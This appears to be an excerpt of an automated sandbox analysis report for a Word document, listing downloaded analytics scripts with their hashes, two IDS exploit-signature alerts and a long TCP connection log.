                                                                                                                                                                                                                                                                                                                                                                          Preview:{"integrations":{"Repeater":{"versionSettings":{"componentTypes":["server"]},"type":"server"},"Segment.io":{"apiKey":"1CjnBNPybWzyv10ssZRxdwmb8vrYF4yj","unbundledIntegrations":["Marketo V2"],"addBundledMetadata":true,"maybeBundledConfigIds":{},"versionSettings":{"version":"4.4.7","componentTypes":["browser"]},"retryQueue":false}},"plan":{"track":{"__default":{"enabled":true,"integrations":{}}},"identify":{"__default":{"enabled":true}},"group":{"__default":{"enabled":true}}},"edgeFunction":{},"analyticsNextEnabled":true,"middlewareSettings":{},"enabledMiddleware":{},"metrics":{"sampleRate":0.1},"legacyVideoPluginsEnabled":false,"remotePlugins":[],"autoInstrumentationSettings":{"disableTraffic":false,"sampleRate":0.1}}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (723)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):7076
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.52488676121649
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:bttd4a6O1T6ahNU3dJ+SrM0hjUYIW2WX8ISlY:bBJ1T9UNJ+SrM0lXV2WXXSlY
                                                                                                                                                                                                                                                                                                                                                                          MD5:88A2E0A522036C0B87E03552E56629AA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EC9D1157518E753A84DBDE1333A29B34CF776D63
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:788AFB96F2DA68E8729EC35F3D5E381FAD3482D37C54C2195C7311440EE4C27E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:44B953878BD650FE2BCC8B6904620955C3E396B7DC8F41F85D021A8E0404DA41DB15C5499A03F7D4FE9129BB340AA3F6782942CF5327502FD4569BEBBB17073F
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://www.googletagmanager.com/static/service_worker/4al0/sw.js?origin=https%3A%2F%2Fmazans.com
                                                                                                                                                                                                                                                                                                                                                                          Preview:'use strict';var k=function(a){function b(c){return a.next(c)}function e(c){return a.throw(c)}return new Promise(function(c,d){function f(h){h.done?c(h.value):Promise.resolve(h.value).then(b,e).then(f,d)}f(a.next())})};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;var u,v;a:{for(var x=["CLOSURE_FLAGS"],B=m,C=0;C<x.length;C++)if(B=B[x[C]],B==null){v=null;break a}v=B}var G=v&&v[610401301];u=G!=null?G:!1;var H;const I=m.navigator;H=I?I.userAgentData||null:null;function J(a){return u?H?H.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function K(a){var b;a:{const e=m.navigator;if(e){const c=e.userAgent;if(c){b=c;break a}}b=""}return b.indexOf(a)!=-1};function L(){return u?!!H&&H.brands.length>0:!1}function O(){return L()?J("Chromium"):(K("Chrome")||K("CriOS"))&&!(L()?0:K("Edge"))||K("Silk")};!K("Android")||O();O();!K("Safari")||O()||(L()?0:K("Coast"))||(L()?0:K("Opera"))||(L()?0:K("Edge"))||(L()?J("Microsoft Edge"):K("Edg/"))||L()&
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (930)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3415
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.918220508981896
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:wXfeR6GTWSuUZO5o9uCqhbFk5rNdQBYB9BYVGW:U7GTWvU8akCqhbFkJWU/W
                                                                                                                                                                                                                                                                                                                                                                          MD5:03889A07B03B0E8F833D4097722D9AC3
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CDD87F6D54DB39AB79492806F3497AC613660C7D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A4A0378726104C9BE4C08042F42F410CB801B1FEC3FB3BDC96123E42A9DDBCA1
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5F9DACC6094F07717DF98E8C77E8529B13D2664C93A243E10A04CB98A52519787E5C96966408BEF83E55E43D575981F3E8633B475B6A67F3DACF133514307EFD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          URL:https://jscloud.net/x/45414/inlinks.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:function findEl(e,t){var n=document.querySelectorAll(e);for(var r=0;r<n.length;r++)if(n[r].textContent.includes(t))return n[r];return null}.var getJSON=function(e,n){var t=new XMLHttpRequest;t.open("GET",e,!0),t.responseType="json",t.onload=function(){var e=t.status;n(200===e?null:e,t.response)},t.send()},pid=45414,jsonPath="https://jscloud.net/x/"+pid+"/"+window.location.href.replace(/(:[^:]+:)http/, 'http').replace(/\/|\.|\-|\:|\=|\?/gi,"")+".json";console.log(jsonPath);getJSON(jsonPath=jsonPath.replace("#body",""),function(e,n){if(null===e){var t=document.getElementsByTagName("p"),a=document.getElementsByTagName("li");for(var r in n){var o=n[r].t,i=n[r].a,s=n[r].n,lnkd=false;if("p"===o||"li"===o){var p,l=n[r].o,lref=n[r].o.replace('\\', '').replace('\\', '');new RegExp(l,"");var lref2 = new RegExp(lref,""); p="p"===o?t:a;for(var d,c=0;c<p.length;c++){if(!lnkd&&p[c].innerHTML.match(l)){-1<p[c].innerHTML.search(i)&&(searchedString=p[c].innerHTML,d=searchedString.replace(lref2,s),(p[c]
                                                                                                                                                                                                                                                                                                                                                                          File type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.994047925906876
                                                                                                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                                                                                                          • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                                                                                                                                                                                                                                                                                                                          • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                                                                                                                                                                                                                                                                                                                          • ZIP compressed archive (8000/1) 9.41%
                                                                                                                                                                                                                                                                                                                                                                          File name:Pmendon.ext_Reord_Adjustment.docx
                                                                                                                                                                                                                                                                                                                                                                          File size:137'779 bytes
                                                                                                                                                                                                                                                                                                                                                                          MD5:5b103f7bf3ff14cef45567a527812be1
                                                                                                                                                                                                                                                                                                                                                                          SHA1:dcae3fddbcc4248154c2b90f3036e3fe19b3426f
                                                                                                                                                                                                                                                                                                                                                                          SHA256:488f034dd875312ed8ef92a540c677865269bfacd573d90455fc93dc6251474d
                                                                                                                                                                                                                                                                                                                                                                          SHA512:80f781a2e52998f3f479e6fc5288b330acd2167aab086b20fb6dfa5544a2714ab5230020db78e9525882834e2b642a4cf3f8541ead81b4de7ad94059a773c718
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:gm7rZHgCTmSCuPV1eMfU5P7iSKJB8BOaV8BSDoMMhvK4ST:BnZdqkVKP7jKJB8kAwxMMAT
                                                                                                                                                                                                                                                                                                                                                                          TLSH:EDD31269CC1C9477F083FF30ED695880E98897E95547E351BC9A8247E5B31CCEB6260B
                                                                                                                                                                                                                                                                                                                                                                          File Content Preview:PK.........nmY................[Content_Types].xml..OO.0...|.(..P....VM9,p\.(b..3i..'....g.h...)[.D.g.{...gz.dM....wuqTM.....v...._.'E.$]#.wP....tv0.o.`.b.u.".?.@..+....WZ..$~.K....K.?&.c..#pTR..g.3h..Pv....H~.`.g.^.SV.k.......7,I......Id.F+I\...y7K.:G....
                                                                                                                                                                                                                                                                                                                                                                          Icon Hash:35e5c48caa8a8599
                                                                                                                                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13T17:29:02.593091+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.1749712TCP
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13T17:29:40.192165+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.1749994TCP
                                                                                                                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:48.314919949 CET49677443192.168.2.17204.79.197.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:48.315021038 CET49678443192.168.2.17204.79.197.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:48.315021992 CET49676443192.168.2.17204.79.197.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.472006083 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.472047091 CET4434970234.168.114.70192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.472106934 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.473561049 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.473579884 CET4434970234.168.114.70192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.916119099 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.916161060 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.916255951 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.918258905 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.918273926 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.207742929 CET4434970234.168.114.70192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.208192110 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.208213091 CET4434970234.168.114.70192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.209989071 CET4434970234.168.114.70192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.210062981 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.212315083 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.212395906 CET4434970234.168.114.70192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.212872028 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.212883949 CET4434970234.168.114.70192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.266722918 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.400998116 CET4434970234.168.114.70192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.401180983 CET4434970234.168.114.70192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.401242018 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.401738882 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.401763916 CET4434970234.168.114.70192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.401773930 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.401817083 CET49702443192.168.2.1734.168.114.70
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.991578102 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.991692066 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.003742933 CET49707443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.003786087 CET44349707103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.003874063 CET49707443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.005723000 CET49707443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.005736113 CET44349707103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.082591057 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.082663059 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.082997084 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.084628105 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.084655046 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.084669113 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.502994061 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.503017902 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.503065109 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.503103971 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.503133059 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.503149033 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.503676891 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.503729105 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.503854036 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.503885031 CET4434970640.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.503942966 CET49706443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.595356941 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.595410109 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.595797062 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.595797062 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:58.595840931 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.237327099 CET49690443192.168.2.17204.79.197.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.243349075 CET44349690204.79.197.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.243436098 CET49690443192.168.2.17204.79.197.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.657102108 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.657244921 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.669153929 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.669202089 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.669944048 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.671169043 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.672935963 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:59.672993898 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.038945913 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.038985014 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.039030075 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.039072037 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.039105892 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.039130926 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.039484978 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.039505959 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.039688110 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.039724112 CET4434970840.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.039771080 CET49708443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.082139015 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.082176924 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.082273006 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.082458019 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:00.082473993 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.173480034 CET49711443192.168.2.17142.250.186.100
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.173506021 CET44349711142.250.186.100192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.173650980 CET49711443192.168.2.17142.250.186.100
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.173878908 CET49711443192.168.2.17142.250.186.100
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.173888922 CET44349711142.250.186.100192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.179420948 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.182198048 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.182276964 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.182980061 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.182995081 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.183048964 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.183063984 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.296739101 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.296829939 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.297024965 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.298142910 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.298181057 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.588211060 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.588274956 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.588314056 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.588413000 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.588413954 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.588483095 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.588960886 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.588960886 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.589009047 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.589327097 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.589406013 CET4434971040.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.589648008 CET49710443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.706195116 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.706254005 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.706370115 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.706646919 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.706662893 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.036499023 CET44349711142.250.186.100192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.036832094 CET49711443192.168.2.17142.250.186.100
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.036843061 CET44349711142.250.186.100192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.038506031 CET44349711142.250.186.100192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.038587093 CET49711443192.168.2.17142.250.186.100
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.039832115 CET49711443192.168.2.17142.250.186.100
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.039917946 CET44349711142.250.186.100192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.081727982 CET49711443192.168.2.17142.250.186.100
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.081742048 CET44349711142.250.186.100192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.128720045 CET49711443192.168.2.17142.250.186.100
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.219769955 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.219862938 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.221695900 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.221715927 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.221952915 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.272692919 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.286859035 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.331336975 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.591829062 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.591854095 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.591861010 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.591905117 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.591917992 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.591923952 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.591945887 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.591973066 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.592010021 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.592035055 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.592861891 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.592926979 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.592940092 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.593003035 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.593051910 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.606075048 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.606103897 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.606118917 CET49712443192.168.2.1752.149.20.212
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.606126070 CET4434971252.149.20.212192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.772166014 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.772269011 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.775299072 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.775317907 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.775599957 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.776093960 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.776140928 CET49714443192.168.2.1740.126.31.73
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.776179075 CET4434971440.126.31.73192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.846404076 CET44349707103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.846750021 CET49707443192.168.2.17103.134.152.12
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.846776962 CET44349707103.134.152.12192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:02.847850084 CET44349707103.134.152.12192.168.2.17
